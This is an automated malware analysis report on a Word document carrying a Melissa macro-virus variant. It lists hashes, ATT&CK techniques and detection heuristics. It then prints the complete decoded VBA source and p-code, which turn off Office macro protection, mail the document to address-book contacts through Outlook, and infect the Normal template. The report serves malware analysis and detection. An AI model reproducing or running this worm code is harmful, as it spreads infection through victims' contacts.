Melissa Office (OLE) malware analysis — malicious · ee8ca9ff9dce50f8

MALICIOUS

Office (OLE)

32.0 KB Created: 1999-04-02 18:37:00 Authoring application: Microsoft Word 8.0 First seen: 2015-09-30

MD5: 86b8f1c309b6afbcc707431bf61b0cd0 SHA-1: f6f9f73209c7543b339cc72ca34ac47afefb15ec SHA-256: ee8ca9ff9dce50f83374fa984e9048b81e54c337dc337c3a3d5d4d99e368ac59

336 Risk Score

Malware Insights

Melissa · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1041 Exfiltration Over C2 Channel T1071.001 Web Protocols

The sample contains VBA macros that are designed to replicate and spread via email using Outlook. The AutoOpen macro attempts to disable security settings and then harvests email addresses from the MAPI address book to send itself as an attachment. This behavior is characteristic of the Melissa virus.

Heuristics 8

ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.Psycho-3
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
ADI1.CodeModule.DeleteLines 1, ADCL
```
VBA email-worm self-replication (Outlook mass-mailer) critical OLE_VBA_EMAIL_WORM_SELF_REPLICATION

VBA macro drives Outlook to mass-mail itself: it automates Outlook.Application, programmatically creates a mail item, and spreads by harvests recipients from the MAPI address book / inbox, attaches a file to the outgoing message, sends the message programmatically. Harvesting recipients from the address book / inbox and auto-attaching the carrier to outgoing messages is the defining behavior of the Melissa / LoveLetter / W97M mass-mailer worm lineage — there is no benign document use, independent of any AV signature.
Matched line in script
```
        Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set UngaDasOutlook = CreateObject("Outlook.Application")
```
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Private Sub AutoOpen()
```
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13135 bytes
SHA-256: `99aa9f83c4e163b1cd5b91731b58d1ce2a26af23d75cdd1c0809c61db1082689`
Detection ClamAV: Doc.Trojan.Melissa-4 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub AutoOpen() On Error Resume Next p$ = "clone" If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& Else p$ = "clone" CommandBars("Tools").Controls("Macro").Enabled = False Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1) End If Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice Set UngaDasOutlook = CreateObject("Outlook.Application") Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI") If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then If UngaDasOutlook = "Outlook" Then DasMapiName.Logon "profile", "password" For y = 1 To DasMapiName.AddressLists.Count Set AddyBook = DasMapiName.AddressLists(y) x = 1 Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.Add Peep x = x + 1 If x > 50 Then oo = AddyBook.AddressEntries.Count Next oo BreakUmOffASlice.Subject = "Важное сообщение от " & Application.UserName BreakUmOffASlice.Body = "Посылаю тебе то, что ты просил... Специально для тебя ! ;-)" BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send Peep = "" Next y DasMapiName.Logoff End If p$ = "clone" System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo" End If Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1) Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1) NTCL = NTI1.CodeModule.CountOfLines ADCL = ADI1.CodeModule.CountOfLines BGN = 2 If ADI1.Name <> "Melissa" Then If ADCL > 0 Then _ ADI1.CodeModule.DeleteLines 1, ADCL Set ToInfect = ADI1 ADI1.Name = "Melissa" DoAD = True End If If NTI1.Name <> "Melissa" Then If NTCL > 0 Then _ NTI1.CodeModule.DeleteLines 1, NTCL Set ToInfect = NTI1 NTI1.Name = "Melissa" DoNT = True End If If DoNT <> True And DoAD <> True Then GoTo CYA If DoNT = True Then Do While ADI1.CodeModule.Lines(1, 1) = "" ADI1.CodeModule.DeleteLines 1 Loop ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()") Do While ADI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop End If p$ = "clone" If DoAD = True Then Do While NTI1.CodeModule.Lines(1, 1) = "" NTI1.CodeModule.DeleteLines 1 Loop ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()") Do While NTI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop End If CYA: If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then ActiveDocument.Saved = True: End If 'WORD/Melissa written by Kwyjibo 'Clone written by Duke/SMF 'Works in both Word 2000 and Word 97 'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide! 'Word -> Email \| Word 97 <--> Word 2000 ... it's a new age! If Day(Now) = Minute(Now) Then Selection.TypeText " Я слишком шустрый для тебя !!! " End Sub ' Processing file: /opt/analyzer/scan_staging/d576974eebf841ba86787043e50864e3.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 6717 bytes ' Line #0: ' FuncDefn (Private Sub AutoOpen()) ' Line #1: ' OnError (Resume Next) ' Line #2: ' LitStr 0x0005 "clone" ' St p$ ' Line #3: ' LitStr 0x0000 "" ' LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security" ' LitStr 0x0005 "Level" ' Ld System ' ArgsMemLd PrivateProfileString 0x0003 ' LitStr 0x0000 "" ' Ne ' IfBlock ' Line #4: ' LitVarSpecial (False) ' LitStr 0x000B "Security..." ' LitStr 0x0005 "Macro" ' ArgsLd CommandBars 0x0001 ' ArgsMemLd Controls 0x0001 ' MemSt Enabled ' Line #5: ' LitDI4 0x0001 0x0000 ' LitStr 0x0000 "" ' LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security" ' LitStr 0x0005 "Level" ' Ld System ' ArgsMemSt PrivateProfileString 0x0003 ' Line #6: ' ElseBlock ' Line #7: ' LitStr 0x0005 "clone" ' St p$ ' Line #8: ' LitVarSpecial (False) ' LitStr 0x0005 "Macro" ' LitStr 0x0005 "Tools" ' ArgsLd CommandBars 0x0001 ' ArgsMemLd Controls 0x0001 ' MemSt Enabled ' Line #9: ' LitDI2 0x0001 ' LitDI2 0x0001 ' Sub ' Paren ' Ld Options ' MemSt ConfirmConversions ' BoS 0x0000 ' LitDI2 0x0001 ' LitDI2 0x0001 ' Sub ' Paren ' Ld Options ' MemSt VirusProtection ' BoS 0x0000 ' LitDI2 0x0001 ' LitDI2 0x0001 ' Sub ' Paren ' Ld Options ' MemSt SaveNormalPrompt ' Line #10: ' EndIfBlock ' Line #11: ' Dim ' VarDefn UngaDasOutlook ' VarDefn DasMapiName ' VarDefn BreakUmOffASlice ' Line #12: ' SetStmt ' LitStr 0x0013 "Outlook.Application" ' ArgsLd CreateObject 0x0001 ' Set UngaDasOutlook ' Line #13: ' SetStmt ' LitStr 0x0004 "MAPI" ' Ld UngaDasOutlook ' ArgsMemLd GetNameSpace 0x0001 ' Set DasMapiName ' Line #14: ' LitStr 0x0000 "" ' LitStr 0x002C "HKEY_CURRENT_USER\Software\Microsoft\Office\" ' LitStr 0x0008 "Melissa?" ' Ld System ' ArgsMemLd PrivateProfileString 0x0003 ' LitStr 0x000E "... by Kwyjibo" ' Ne ' IfBlock ' Line #15: ' Ld UngaDasOutlook ' LitStr 0x0007 "Outlook" ' Eq ' IfBlock ' Line #16: ' LitStr 0x0007 "profile" ' LitStr 0x0008 "password" ' Ld DasMapiName ' ArgsMemCall Logon 0x0002 ' Line #17: ' StartForVariable ' Ld y ' EndForVariable ' LitDI2 0x0001 ' Ld DasMapiName ' MemLd AddressLists ' MemLd Count ' For ' Line #18: ' SetStmt ' Ld y ' Ld DasMapiName ' ArgsMemLd AddressLists 0x0001 ' Set AddyBook ' Line #19: ' LitDI2 0x0001 ' St x ' Line #20: ' SetStmt ' LitDI2 0x0000 ' Ld UngaDasOutlook ' ArgsMemLd CreateItem 0x0001 ' Set BreakUmOffASlice ' Line #21: ' StartForVariable ' Ld oo ' EndForVariable ' LitDI2 0x0001 ' Ld AddyBook ' MemLd AddressEntries ' MemLd Count ' For ' Line #22: ' Ld x ' Ld AddyBook ' ArgsMemLd AddressEntries 0x0001 ' St Peep ' Line #23: ' Ld Peep ' Ld BreakUmOffASlice ' MemLd Recipients ' ArgsMemCall Add 0x0001 ' Line #24: ' Ld x ' LitDI2 0x0001 ' Add ' St x ' Line #25: ' Ld x ' LitDI2 0x0032 ' Gt ' If ' BoSImplicit ' Ld AddyBook ' MemLd AddressEntries ' MemLd Count ' St oo ' EndIf ' Line #26: ' StartForVariable ' Ld oo ' EndForVariable ' NextVar ' Line #27: ' LitStr 0x0014 "Важное сообщение от " ' Ld Application ' MemLd UserName ' Concat ' Ld BreakUmOffASlice ' MemSt Subject ' Line #28: ' LitStr 0x003B "Посылаю тебе то, что ты просил... Специально для тебя ! ;-)" ' Ld BreakUmOffASlice ' MemSt Body ' Line #29: ' Ld ActiveDocument ' MemLd FullName ' Ld BreakUmOffASlice ' MemLd Attachments ' ArgsMemCall Add 0x0001 ' Line #30: ' Ld BreakUmOffASlice ' ArgsMemCall Send 0x0000 ' Line #31: ' LitStr 0x0000 "" ' St Peep ' Line #32: ' StartForVariable ' Ld y ' EndForVariable ' NextVar ' Line #33: ' Ld DasMapiName ' ArgsMemCall Logoff 0x0000 ' Line #34: ' EndIfBlock ' Line #35: ' LitStr 0x0005 "clone" ' St p$ ' Line #36: ' LitStr 0x000E "... by Kwyjibo" ' LitStr 0x0000 "" ' LitStr 0x002C "HKEY_CURRENT_USER\Software\Microsoft\Office\" ' LitStr 0x0008 "Melissa?" ' Ld System ' ArgsMemSt PrivateProfileString 0x0003 ' Line #37: ' EndIfBlock ' Line #38: ' SetStmt ' LitDI2 0x0001 ' Ld ActiveDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' Set ADI1 ' Line #39: ' SetStmt ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' Set NTI1 ' Line #40: ' Ld NTI1 ' MemLd CodeModule ' MemLd CountOfLines ' St NTCL ' Line #41: ' Ld ADI1 ' MemLd CodeModule ' MemLd CountOfLines ' St ADCL ' Line #42: ' LitDI2 0x0002 ' St BGN ' Line #43: ' Ld ADI1 ' MemLd New ' LitStr 0x0007 "Melissa" ' Ne ' IfBlock ' Line #44: ' LineCont 0x0004 05 00 00 00 ' Ld ADCL ' LitDI2 0x0000 ' Gt ' If ' BoSImplicit ' LitDI2 0x0001 ' Ld ADCL ' Ld ADI1 ' MemLd CodeModule ' ArgsMemCall DeleteLines 0x0002 ' EndIf ' Line #45: ' SetStmt ' Ld ADI1 ' Set ToInfect ' Line #46: ' LitStr 0x0007 "Melissa" ' Ld ADI1 ' MemSt New ' Line #47: ' LitVarSpecial (True) ' St DoAD ' Line #48: ' EndIfBlock ' Line #49: ' Ld NTI1 ' MemLd New ' LitStr 0x0007 "Melissa" ' Ne ' IfBlock ' Line #50: ' LineCont 0x0004 05 00 00 00 ' Ld NTCL ' LitDI2 0x0000 ' Gt ' If ' BoSImplicit ' LitDI2 0x0001 ' Ld NTCL ' Ld NTI1 ' MemLd CodeModule ' ArgsMemCall DeleteLines 0x0002 ' EndIf ' Line #51: ' SetStmt ' Ld NTI1 ' Set ToInfect ' Line #52: ' LitStr 0x0007 "Melissa" ' Ld NTI1 ' MemSt New ' Line #53: ' LitVarSpecial (True) ' St DoNT ' Line #54: ' EndIfBlock ' Line #55: ' Ld DoNT ' LitVarSpecial (True) ' Ne ' Ld DoAD ' LitVarSpecial (True) ' Ne ' And ' If ' BoSImplicit ' GoTo CYA ' EndIf ' Line #56: ' Ld DoNT ' LitVarSpecial (True) ' Eq ' IfBlock ' Line #57: ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld ADI1 ' MemLd CodeModule ' ArgsMemLd Lines 0x0002 ' LitStr 0x0000 "" ' Eq ' DoWhile ' Line #58: ' LitDI2 0x0001 ' Ld ADI1 ' MemLd CodeModule ' ArgsMemCall DeleteLines 0x0001 ' Line #59: ' Loop ' Line #60: ' LitStr 0x001C "Private Sub Document_Close()" ' Paren ' Ld ToInfect ' MemLd CodeModule ' ArgsMemCall AddFromString 0x0001 ' Line #61: ' Ld BGN ' LitDI2 0x0001 ' Ld ADI1 ' MemLd CodeModule ' ArgsMemLd Lines 0x0002 ' LitStr 0x0000 "" ' Ne ' DoWhile ' Line #62: ' Ld BGN ' Ld BGN ' LitDI2 0x0001 ' Ld ADI1 ' MemLd CodeModule ' ArgsMemLd Lines 0x0002 ' Ld ToInfect ' MemLd CodeModule ' ArgsMemCall InsertLines 0x0002 ' Line #63: ' Ld BGN ' LitDI2 0x0001 ' Add ' St BGN ' Line #64: ' Loop ' Line #65: ' EndIfBlock ' Line #66: ' LitStr 0x0005 "clone" ' St p$ ' Line #67: ' Ld DoAD ' LitVarSpecial (True) ' Eq ' IfBlock ' Line #68: ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld NTI1 ' MemLd CodeModule ' ArgsMemLd Lines 0x0002 ' LitStr 0x0000 "" ' Eq ' DoWhile ' Line #69: ' LitDI2 0x0001 ' Ld NTI1 ' MemLd CodeModule ' ArgsMemCall DeleteLines 0x0001 ' Line #70: ' Loop ' Line #71: ' LitStr 0x001B "Private Sub Document_Open()" ' Paren ' Ld ToInfect ' MemLd CodeModule ' ArgsMemCall AddFromString 0x0001 ' Line #72: ' Ld BGN ' LitDI2 0x0001 ' Ld NTI1 ' MemLd CodeModule ' ArgsMemLd Lines 0x0002 ' LitStr 0x0000 "" ' Ne ' DoWhile ' Line #73: ' Ld BGN ' Ld BGN ' LitDI2 0x0001 ' Ld NTI1 ' MemLd CodeModule ' ArgsMemLd Lines 0x0002 ' Ld ToInfect ' MemLd CodeModule ' ArgsMemCall InsertLines 0x0002 ' Line #74: ' Ld BGN ' LitDI2 0x0001 ' Add ' St BGN ' Line #75: ' Loop ' Line #76: ' EndIfBlock ' Line #77: ' Label CYA ' Line #78: ' Ld NTCL ' LitDI2 0x0000 ' Ne ' Ld ADCL ' LitDI2 0x0000 ' Eq ' And ' LitDI2 0x0001 ' Ld ActiveDocument ' MemLd New ' LitStr 0x0008 "Document" ' FnInStr3 ' LitVarSpecial (False) ' Eq ' Paren ' And ' IfBlock ' Line #79: ' Ld ActiveDocument ' MemLd FullName ' ParamNamed FileName ' Ld ActiveDocument ' ArgsMemCall SaveAs 0x0001 ' Line #80: ' LitDI2 0x0001 ' Ld ActiveDocument ' MemLd New ' LitStr 0x0008 "Document" ' FnInStr3 ' LitVarSpecial (False) ' Ne ' Paren ' ElseIfBlock ' Line #81: ' LitVarSpecial (True) ' Ld ActiveDocument ' MemSt Saved ' BoS 0x0000 ' EndIfBlock ' Line #82: ' QuoteRem 0x0000 0x001F "WORD/Melissa written by Kwyjibo" ' Line #83: ' QuoteRem 0x0000 0x0019 "Clone written by Duke/SMF" ' Line #84: ' QuoteRem 0x0000 0x0023 "Works in both Word 2000 and Word 97" ' Line #85: ' QuoteRem 0x0000 0x003E "Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!" ' Line #86: ' QuoteRem 0x0000 0x003A "Word -> Email \| Word 97 <--> Word 2000 ... it's a new age!" ' Line #87: ' Ld Now ' ArgsLd Day 0x0001 ' Ld Now ' ArgsLd Minute 0x0001 ' Eq ' If ' BoSImplicit ' LitStr 0x0020 " Я слишком шустрый для тебя !!! " ' Ld Selection ' ArgsMemCall TypeText 0x0001 ' EndIf ' Line #88: ' EndSub ' Line #89: ' Line #90:

Open this report in the interactive analyzer, or submit your own file for analysis.